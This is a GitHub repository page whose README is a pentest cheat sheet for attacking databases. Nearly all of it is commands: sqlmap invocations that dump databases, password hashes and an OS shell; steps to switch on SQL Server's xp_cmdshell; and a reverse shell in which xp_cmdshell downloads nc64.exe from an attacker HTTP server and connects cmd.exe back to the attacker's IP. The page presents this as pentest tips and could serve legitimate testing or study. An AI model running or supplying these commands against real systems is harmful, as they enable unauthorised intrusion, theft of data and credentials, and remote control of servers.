Skip to content

Kiosec/Database-Exploitation

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
README.md
README.md
 
 

Repository files navigation

Database-Exploitation

SQLMAP

➤ Specify a DBMS
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbms Oracle


➤ Enumerate the database names
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs


➤ Enumerate the tables
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D {DATABASE} --tables


➤ Enumerate the columns
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D {DATABASE} -T {TABLE} --columns


➤ Dump columns
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D {DATABASE} -T {TABLE} -C {COLUMN01, COLUMNS02...} --dump


➤ Get the operating system command shell
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --os-shell
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --os-cmd=whoami


➤ Try to detect and dump the passwords
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --passwords

SQSH - Connect to a database

sqsh -U <user> -P <password> -S <ip:port> -D <database>
ex: sqsh -U sa -P badpassword -S 10.0.0.1:1433 -D bankdb

Activate xp_cmdshell

Error: "SQL Server blocked access to proecedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can be enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online."

1> EXEC SP_CONFIGURE 'show advanced options',1
2> reconfigure
3> go

1> EXEC SP_CONFIGURE 'xp_cmdshell',1
2> reconfigure
3> go

Execute commands through xp_cmdshell

1> xp_cmdshell 'whoami'
2> go

Reverse shell through xp_cmdshell

➤ Create a netcat listener
nc -lvp 443

➤ Create a reverse shell (here nc64.exe) and the http server 
python3 -m http.server

➤ On the database, upload the file from the http server
1> exec xp_cmdshell "powershell.exe wget http://192.168.119.194:8000/nc64.exe -OutFile c:\Users\Public\nc64.exe"
2> go

➤ Execute the script
1> xp_cmdshell 'c:\Users\Public\nc64.exe -e cmd.exe 192.168.119.194 443'
2> go

About

Pentest tips on databases

Topics

sqlmap

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published